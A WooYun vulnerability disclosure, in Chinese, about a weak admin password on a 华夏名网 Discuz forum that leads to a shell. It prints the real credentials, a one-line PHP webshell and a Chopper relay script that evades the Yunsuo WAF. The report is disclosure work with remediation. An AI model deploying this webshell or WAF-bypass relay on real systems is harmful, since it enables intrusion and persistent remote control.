当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170867

漏洞标题:华夏名网某分站弱口令可Getshell(过云锁waf案例)

相关厂商:华夏名网

漏洞作者: 路人甲

提交时间:2016-01-18 15:57

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

华夏名网某分站弱口令可getshell(过云锁waf案例)

详细说明:

直接进入正题吧,这次的站点是http://bbs.sudu.cn/
弱口令:用户名admin 密码qwer

01.jpg


进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考
WooYun: Discuz3.2后台文件包含漏洞可后台拿shell
具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器具体IP添加到本地host里面去,否则云锁waf会拦截的(至于怎么获得具体IP,最简单的是发送邮件测试)
通过后台“文件检验”功能,我们能清楚的看到一句话文件成功生成了

02.jpg


我们浏览器访问看看

03.jpg


被云锁waf拦截了,估计菜刀肯定也连不了

04.jpg


果不其然,也被拦了,乌云zone翻了下前辈们的经验之谈,终于突破了,重点请往下看
1、变形一句话

<?php
$_REQUEST['a']($_REQUEST['b']);
?>


按上面getshell的方法重新将一句话写入根目录,得访问地址http://bbs.sudu.cn/help.php
测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();

05.jpg


2、新建shell.php,填入菜刀中转脚本

<?php
$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
if(strstr($v, "base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>


3、本地搭建php环境,将中转脚本置于中,菜刀中连接,
地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b

06.jpg


成功突破,如图

07.jpg

漏洞证明:

07.jpg

修复方案:

1、强壮弱口令
2、开源程序及时打补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2016-01-18 16:30

厂商回复:

这是已经放弃维护的网站,里面不牵涉主站数据,仅有少量用户注册,后期都已经关闭了用户注册。已经提交公司审核,估计是会升级或者关停此服务器。
也谢谢白帽子对我们公司的帮助

最新状态:

暂无